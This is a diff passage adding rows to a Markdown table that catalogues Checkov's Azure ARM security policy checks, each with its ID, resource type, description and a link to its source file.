+| 47 | CKV_AZURE_36 | resource | Microsoft.Storage/storageAccounts | Ensure 'Trusted Microsoft Services' is enabled for Storage Account access | arm | [StorageAccountAzureServicesAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountAzureServicesAccessEnabled.py) |
+| 48 | CKV_AZURE_37 | resource | Microsoft.Insights/logprofiles | Ensure that Activity Log Retention is set 365 days or greater | arm | [MonitorLogProfileRetentionDays.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileRetentionDays.py) |
+| 49 | CKV_AZURE_38 | resource | Microsoft.Insights/logprofiles | Ensure audit profile captures all the activities | arm | 
[MonitorLogProfileCategories.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MonitorLogProfileCategories.py) |
+| 50 | CKV_AZURE_39 | resource | Microsoft.Authorization/roleDefinitions | Ensure that no custom subscription owner roles are created | arm | [CustomRoleDefinitionSubscriptionOwner.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CustomRoleDefinitionSubscriptionOwner.py) |
+| 51 | CKV_AZURE_40 | resource | Microsoft.KeyVault/vaults/keys | Ensure that the expiration date is set on all keys | arm | [KeyExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyExpirationDate.py) |
+| 52 | CKV_AZURE_41 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that the expiration date is set on all secrets | arm | [SecretExpirationDate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretExpirationDate.py) |
+| 53 | CKV_AZURE_42 | resource | Microsoft.KeyVault/vaults | Ensure the key vault is recoverable | arm | [KeyvaultRecoveryEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyvaultRecoveryEnabled.py) |
+| 54 | CKV_AZURE_43 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Accounts adhere to the naming rules | arm | [StorageAccountName.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountName.py) |
+| 55 | CKV_AZURE_44 | resource | Microsoft.Storage/storageAccounts | Ensure Storage Account is using the latest version of TLS encryption | arm | [StorageAccountMinimumTlsVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountMinimumTlsVersion.py) |
+| 56 | CKV_AZURE_45 | resource | Microsoft.Compute/virtualMachines | Ensure that no sensitive credentials are exposed in VM custom_data | arm | 
[VMCredsInCustomData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMCredsInCustomData.py) |
+| 57 | CKV_AZURE_47 | resource | Microsoft.DBforMariaDB/servers | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MariaDB servers | arm | [MariaDBSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBSSLEnforcementEnabled.py) |
+| 58 | CKV_AZURE_48 | resource | Microsoft.DBforMariaDB/servers | Ensure 'public network access enabled' is set to 'False' for MariaDB servers | arm | [MariaDBPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBPublicAccessDisabled.py) |
+| 59 | CKV_AZURE_49 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure Azure linux scale set does not use basic authentication(Use SSH Key Instead) | arm | [AzureScaleSetPassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureScaleSetPassword.py) |
+| 60 | CKV_AZURE_50 | resource | Microsoft.Compute/virtualMachines | Ensure Virtual Machine Extensions are not Installed | arm | [AzureInstanceExtensions.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstanceExtensions.py) |
+| 61 | CKV_AZURE_52 | resource | Microsoft.Sql/servers | Ensure MSSQL is using the latest version of TLS encryption | arm | [MSSQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MSSQLServerMinTLSVersion.py) |
+| 62 | CKV_AZURE_53 | resource | Microsoft.DBforMySQL/servers | Ensure 'public network access enabled' is set to 'False' for mySQL servers | arm | [MySQLPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLPublicAccessDisabled.py) |
+| 63 | CKV_AZURE_54 | resource | Microsoft.DBforMySQL/servers | Ensure MySQL is using the latest version of TLS encryption | arm | 
[MySQLServerMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerMinTLSVersion.py) |
+| 64 | CKV_AZURE_56 | resource | Microsoft.Web/sites/config | Ensure that function apps enables Authentication | arm | [FunctionAppsEnableAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsEnableAuthentication.py) |
+| 65 | CKV_AZURE_57 | resource | Microsoft.Web/sites | Ensure that CORS disallows every resource to access app services | arm | [AppServiceDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDisallowCORS.py) |
+| 66 | CKV_AZURE_58 | resource | Microsoft.Synapse/workspaces | Ensure that Azure Synapse workspaces enables managed virtual networks | arm | [SynapseWorkspaceEnablesManagedVirtualNetworks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesManagedVirtualNetworks.py) |
+| 67 | CKV_AZURE_59 | resource | Microsoft.Storage/storageAccounts | Ensure that Storage accounts disallow public access | arm | [StorageAccountDisablePublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountDisablePublicAccess.py) |
+| 68 | CKV_AZURE_62 | resource | Microsoft.Web/sites | Ensure function apps are not accessible from all regions | arm | [FunctionAppDisallowCORS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppDisallowCORS.py) |
+| 69 | CKV_AZURE_63 | resource | Microsoft.Web/sites/config | Ensure that App service enables HTTP logging | arm | [AppServiceHttpLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttpLoggingEnabled.py) |
+| 70 | CKV_AZURE_64 | resource | Microsoft.StorageSync/storageSyncServices | Ensure that Azure File Sync disables public network access | arm | 
[StorageSyncPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageSyncPublicAccessDisabled.py) |
+| 71 | CKV_AZURE_65 | resource | Microsoft.Web/sites/config | Ensure that App service enables detailed error messages | arm | [AppServiceDetailedErrorMessagesEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDetailedErrorMessagesEnabled.py) |
+| 72 | CKV_AZURE_66 | resource | Microsoft.Web/sites/config | Ensure that App service enables failed request tracing | arm | [AppServiceEnableFailedRequest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceEnableFailedRequest.py) |
+| 73 | CKV_AZURE_67 | resource | Microsoft.Web/sites | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 74 | CKV_AZURE_67 | resource | Microsoft.Web/sites/slots | Ensure that 'HTTP Version' is the latest, if used to run the Function app | arm | [FunctionAppHttpVersionLatest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppHttpVersionLatest.py) |
+| 75 | CKV_AZURE_68 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server disables public network access | arm | [PostgreSQLServerPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerPublicAccessDisabled.py) |
+| 76 | CKV_AZURE_70 | resource | Microsoft.Web/sites | Ensure that Function apps is only accessible over HTTPS | arm | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 77 | CKV_AZURE_70 | resource | Microsoft.Web/sites/config | Ensure that Function apps is only accessible over HTTPS | arm | 
[FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 78 | CKV_AZURE_70 | resource | Microsoft.Web/sites/slots | Ensure that Function apps is only accessible over HTTPS | arm | [FunctionAppsAccessibleOverHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppsAccessibleOverHttps.py) |
+| 79 | CKV_AZURE_71 | resource | Microsoft.Web/sites | Ensure that Managed identity provider is enabled for web apps | arm | [AppServiceIdentityProviderEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentityProviderEnabled.py) |
+| 80 | CKV_AZURE_72 | resource | Microsoft.Web/sites | Ensure that remote debugging is not enabled for app services | arm | [AppServiceRemoteDebuggingNotEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceRemoteDebuggingNotEnabled.py) |
+| 81 | CKV_AZURE_73 | resource | Microsoft.Automation/automationAccounts/variables | Ensure that Automation account variables are encrypted | arm | [AutomationEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AutomationEncrypted.py) |
+| 82 | CKV_AZURE_74 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer (Kusto) uses disk encryption | arm | [DataExplorerUsesDiskEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataExplorerUsesDiskEncryption.py) |
+| 83 | CKV_AZURE_75 | resource | Microsoft.Kusto/clusters | Ensure that Azure Data Explorer uses double encryption | arm | [AzureDataExplorerDoubleEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDataExplorerDoubleEncryptionEnabled.py) |
+| 84 | CKV_AZURE_76 | resource | Microsoft.Batch/batchAccounts | Ensure that Azure Batch account uses key vault to encrypt data | arm | 
[AzureBatchAccountUsesKeyVaultEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureBatchAccountUsesKeyVaultEncryption.py) |
+| 85 | CKV_AZURE_78 | resource | Microsoft.Web/sites | Ensure FTP deployments are disabled | arm | [AppServiceFTPSState.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceFTPSState.py) |
+| 86 | CKV_AZURE_79 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for SQL servers on machines | arm | [AzureDefenderOnSqlServersVMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnSqlServersVMS.py) |
+| 87 | CKV_AZURE_80 | resource | Microsoft.Web/sites/config | Ensure that 'Net Framework' version is the latest, if used as a part of the web app | arm | [AppServiceDotnetFrameworkVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceDotnetFrameworkVersion.py) |
+| 88 | CKV_AZURE_81 | resource | Microsoft.Web/sites | Ensure that 'PHP version' is the latest, if used to run the web app | arm | [AppServicePHPVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePHPVersion.py) |
+| 89 | CKV_AZURE_82 | resource | Microsoft.Web/sites | Ensure that 'Python version' is the latest, if used to run the web app | arm | [AppServicePythonVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServicePythonVersion.py) |
+| 90 | CKV_AZURE_83 | resource | Microsoft.Web/sites | Ensure that 'Java version' is the latest, if used to run the web app | arm | [AppServiceJavaVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceJavaVersion.py) |
+| 91 | CKV_AZURE_84 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Storage | arm | 
[AzureDefenderOnStorage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnStorage.py) |
+| 92 | CKV_AZURE_85 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Kubernetes | arm | [AzureDefenderOnKubernetes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKubernetes.py) |
+| 93 | CKV_AZURE_87 | resource | Microsoft.Security/pricings | Ensure that Azure Defender is set to On for Key Vault | arm | [AzureDefenderOnKeyVaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureDefenderOnKeyVaults.py) |
+| 94 | CKV_AZURE_88 | resource | Microsoft.Web/sites/config | Ensure that app services use Azure Files | arm | [AppServiceUsedAzureFiles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceUsedAzureFiles.py) |
+| 95 | CKV_AZURE_89 | resource | Microsoft.Cache/redis | Ensure that Azure Cache for Redis disables public network access | arm | [RedisCachePublicNetworkAccessEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/RedisCachePublicNetworkAccessEnabled.py) |
+| 96 | CKV_AZURE_92 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual Machines use managed disks | arm | [VMStorageOsDisk.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMStorageOsDisk.py) |
+| 97 | CKV_AZURE_93 | resource | Microsoft.Compute/disks | Ensure that managed disks use a specific set of disk encryption sets for the customer-managed key encryption | arm | [AzureManagedDiskEncryptionSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiskEncryptionSet.py) |
+| 98 | CKV_AZURE_94 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that My SQL server enables geo-redundant backups | arm | 
[MySQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLGeoBackupEnabled.py) |
+| 99 | CKV_AZURE_95 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that automatic OS image patching is enabled for Virtual Machine Scale Sets | arm | [VMScaleSetsAutoOSImagePatchingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMScaleSetsAutoOSImagePatchingEnabled.py) |
+| 100 | CKV_AZURE_96 | resource | Microsoft.DBforMySQL/flexibleServers | Ensure that MySQL server enables infrastructure encryption | arm | [MySQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLEncryptionEnabled.py) |
+| 101 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 102 | CKV_AZURE_97 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine scale sets have encryption at host enabled | arm | [VMEncryptionAtHostEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMEncryptionAtHostEnabled.py) |
+| 103 | CKV_AZURE_99 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure Cosmos DB accounts have restricted access | arm | [CosmosDBAccountsRestrictedAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBAccountsRestrictedAccess.py) |
+| 104 | CKV_AZURE_100 | resource | Microsoft.DocumentDb/databaseAccounts | Ensure that Cosmos DB accounts have customer-managed keys to encrypt data at rest | arm | [CosmosDBHaveCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBHaveCMK.py) |
+| 105 | CKV_AZURE_101 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Azure 
Cosmos DB disables public network access | arm | [CosmosDBDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisablesPublicNetwork.py) |
+| 106 | CKV_AZURE_102 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables geo-redundant backups | arm | [PostgressSQLGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgressSQLGeoBackupEnabled.py) |
+| 107 | CKV_AZURE_103 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data Factory uses Git repository for source control | arm | [DataFactoryUsesGitRepository.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryUsesGitRepository.py) |
+| 108 | CKV_AZURE_104 | resource | Microsoft.DataFactory/factories | Ensure that Azure Data factory public network access is disabled | arm | [DataFactoryNoPublicNetworkAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataFactoryNoPublicNetworkAccess.py) |
+| 109 | CKV_AZURE_105 | resource | Microsoft.DataLakeStore/accounts | Ensure that Data Lake Store accounts enables encryption | arm | [DataLakeStoreEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DataLakeStoreEncryption.py) |
+| 110 | CKV_AZURE_107 | resource | Microsoft.ApiManagement/service | Ensure that API management services use virtual networks | arm | [APIServicesUseVirtualNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIServicesUseVirtualNetwork.py) |
+| 111 | CKV_AZURE_109 | resource | Microsoft.KeyVault/vaults | Ensure that key vault allows firewall rules settings | arm | [KeyVaultEnablesFirewallRulesSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesFirewallRulesSettings.py) |
+| 112 | CKV_AZURE_110 | resource | Microsoft.KeyVault/vaults | Ensure that key 
vault enables purge protection | arm | [KeyVaultEnablesPurgeProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesPurgeProtection.py) |
+| 113 | CKV_AZURE_111 | resource | Microsoft.KeyVault/vaults | Ensure that key vault enables soft delete | arm | [KeyVaultEnablesSoftDelete.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyVaultEnablesSoftDelete.py) |
+| 114 | CKV_AZURE_112 | resource | Microsoft.KeyVault/vaults/keys | Ensure that key vault key is backed by HSM | arm | [KeyBackedByHSM.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/KeyBackedByHSM.py) |
+| 115 | CKV_AZURE_113 | resource | Microsoft.Sql/servers | Ensure that SQL server disables public network access | arm | [SQLServerHasPublicAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerHasPublicAccessDisabled.py) |
+| 116 | CKV_AZURE_114 | resource | Microsoft.KeyVault/vaults/secrets | Ensure that key vault secrets have "content_type" set | arm | [SecretContentType.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecretContentType.py) |
+| 117 | CKV_AZURE_121 | resource | Microsoft.Network/frontDoors | Ensure that Azure Front Door enables WAF | arm | [AzureFrontDoorEnablesWAF.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureFrontDoorEnablesWAF.py) |
+| 118 | CKV_AZURE_123 | resource | Microsoft.Network/FrontDoorWebApplicationFirewallPolicies | Ensure that Azure Front Door uses WAF in "Detection" or "Prevention" modes | arm | [FrontdoorUseWAFMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontdoorUseWAFMode.py) |
+| 119 | CKV_AZURE_125 | resource | Microsoft.ServiceFabric/clusters | Ensures that Service Fabric use three levels of protection available | arm | 
[AzureServiceFabricClusterProtectionLevel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureServiceFabricClusterProtectionLevel.py) |
+| 120 | CKV_AZURE_129 | resource | Microsoft.DBforMariaDB/servers | Ensure that MariaDB server enables geo-redundant backups | arm | [MariaDBGeoBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MariaDBGeoBackupEnabled.py) |
+| 121 | CKV_AZURE_130 | resource | Microsoft.DBforPostgreSQL/servers | Ensure that PostgreSQL server enables infrastructure encryption | arm | [PostgreSQLEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLEncryptionEnabled.py) |
+| 122 | CKV_AZURE_131 | parameter | secureString | SecureString parameter should not have hardcoded default values | arm | [SecureStringParameterNoHardcodedValue.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/parameter/SecureStringParameterNoHardcodedValue.py) |
+| 123 | CKV_AZURE_132 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure cosmosdb does not allow privileged escalation by restricting management plane changes | arm | [CosmosDBDisableAccessKeyWrite.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBDisableAccessKeyWrite.py) |
+| 124 | CKV_AZURE_133 | resource | Microsoft.Network/frontdoorWebApplicationFirewallPolicies | Ensure Front Door WAF prevents message lookup in Log4j2. 
See CVE-2021-44228 aka log4jshell | arm | [FrontDoorWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FrontDoorWAFACLCVE202144228.py) |
+| 125 | CKV_AZURE_134 | resource | Microsoft.CognitiveServices/accounts | Ensure that Cognitive Services accounts disable public network access | arm | [CognitiveServicesDisablesPublicNetwork.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CognitiveServicesDisablesPublicNetwork.py) |
+| 126 | CKV_AZURE_135 | resource | Microsoft.Network/ApplicationGatewayWebApplicationFirewallPolicies | Ensure Application Gateway WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | arm | [AppGatewayWAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppGatewayWAFACLCVE202144228.py) |
+| 127 | CKV_AZURE_137 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR admin account is disabled | arm | [ACRAdminAccountDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAdminAccountDisabled.py) |
+| 128 | CKV_AZURE_138 | resource | Microsoft.ContainerRegistry/registries | Ensures that ACR disables anonymous pulling of images | arm | [ACRAnonymousPullDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRAnonymousPullDisabled.py) |
+| 129 | CKV_AZURE_139 | resource | Microsoft.ContainerRegistry/registries | Ensure ACR set to disable public networking | arm | [ACRPublicNetworkAccessDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRPublicNetworkAccessDisabled.py) |
+| 130 | CKV_AZURE_140 | resource | Microsoft.DocumentDB/databaseAccounts | Ensure that Local Authentication is disabled on CosmosDB | arm | [CosmosDBLocalAuthDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/CosmosDBLocalAuthDisabled.py) |
+| 131 | CKV_AZURE_141 | resource 
| Microsoft.ContainerService/managedClusters | Ensure AKS local admin account is disabled | arm | [AKSLocalAdminDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLocalAdminDisabled.py) |
+| 132 | CKV_AZURE_145 | resource | Microsoft.Web/sites | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 133 | CKV_AZURE_145 | resource | Microsoft.Web/sites/slots | Ensure Function app is using the latest version of TLS encryption | arm | [FunctionAppMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/FunctionAppMinTLSVersion.py) |
+| 134 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachineScaleSets | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 135 | CKV_AZURE_149 | resource | Microsoft.Compute/virtualMachines | Ensure that Virtual machine does not enable password authentication | arm | [VMDisablePasswordAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/VMDisablePasswordAuthentication.py) |
+| 136 | CKV_AZURE_151 | resource | Microsoft.Compute/virtualMachines | Ensure Windows VM enables encryption | arm | [WinVMEncryptionAtHost.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/WinVMEncryptionAtHost.py) |
+| 137 | CKV_AZURE_153 | resource | Microsoft.Web/sites | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service Slot | arm | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) |
+| 138 | CKV_AZURE_153 | resource | Microsoft.Web/sites/slots | Ensure web app 
redirects all HTTP traffic to HTTPS in Azure App Service Slot | arm | [AppServiceSlotHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotHTTPSOnly.py) |
+| 139 | CKV_AZURE_155 | resource | Microsoft.Web/sites | Ensure debugging is disabled for the App service slot | arm | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) |
+| 140 | CKV_AZURE_155 | resource | Microsoft.Web/sites/slots | Ensure debugging is disabled for the App service slot | arm | [AppServiceSlotDebugDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceSlotDebugDisabled.py) |
+| 141 | CKV_AZURE_157 | resource | Microsoft.Synapse/workspaces | Ensure that Synapse workspace has data_exfiltration_protection_enabled | arm | [SynapseWorkspaceEnablesDataExfilProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SynapseWorkspaceEnablesDataExfilProtection.py) |
+| 142 | CKV_AZURE_158 | resource | Microsoft.Databricks/workspaces | Ensure Databricks Workspace data plane to control plane communication happens over private link | arm | [DatabricksWorkspaceIsNotPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/DatabricksWorkspaceIsNotPublic.py) |
+| 143 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 144 | CKV_AZURE_160 | resource | Microsoft.Network/networkSecurityGroups/securityRules | Ensure that HTTP (port 80) access is restricted from the internet | arm | [NSGRuleHTTPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleHTTPAccessRestricted.py) |
+| 
145 | CKV_AZURE_163 | resource | Microsoft.ContainerRegistry/registries | Enable vulnerability scanning for container images. | arm | [ACRContainerScanEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACRContainerScanEnabled.py) |
+| 146 | CKV_AZURE_166 | resource | Microsoft.ContainerRegistry/registries | Ensure container image quarantine, scan, and mark images verified | arm | [ACREnableImageQuarantine.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/ACREnableImageQuarantine.py) |
+| 147 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. | arm | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) |
+| 148 | CKV_AZURE_168 | resource | Microsoft.ContainerService/managedClusters/agentPools | Ensure Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods. 
| arm | [AKSMaxPodsMinimum.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSMaxPodsMinimum.py) |
+| 149 | CKV_AZURE_169 | resource | Microsoft.ContainerService/managedClusters | Ensure Azure Kubernetes Cluster (AKS) nodes use scale sets | arm | [AKSPoolTypeIsScaleSet.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSPoolTypeIsScaleSet.py) |
+| 150 | CKV_AZURE_171 | resource | Microsoft.ContainerService/managedClusters | Ensure AKS cluster upgrade channel is chosen | arm | [AKSUpgradeChannel.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSUpgradeChannel.py) |
+| 151 | CKV_AZURE_172 | resource | Microsoft.ContainerService/managedClusters | Ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters | arm | [AkSSecretStoreRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AkSSecretStoreRotation.py) |
+| 152 | CKV_AZURE_173 | resource | Microsoft.ApiManagement/service | Ensure API management uses at least TLS 1.2 | arm | [APIManagementMinTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementMinTLS12.py) |
+| 153 | CKV_AZURE_174 | resource | Microsoft.ApiManagement/service | Ensure API management public access is disabled | arm | [APIManagementPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/APIManagementPublicAccess.py) |
+| 154 | CKV_AZURE_175 | resource | Microsoft.SignalRService/webPubSub | Ensure Web PubSub uses a SKU with an SLA | arm | [PubsubSKUSLA.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PubsubSKUSLA.py) |
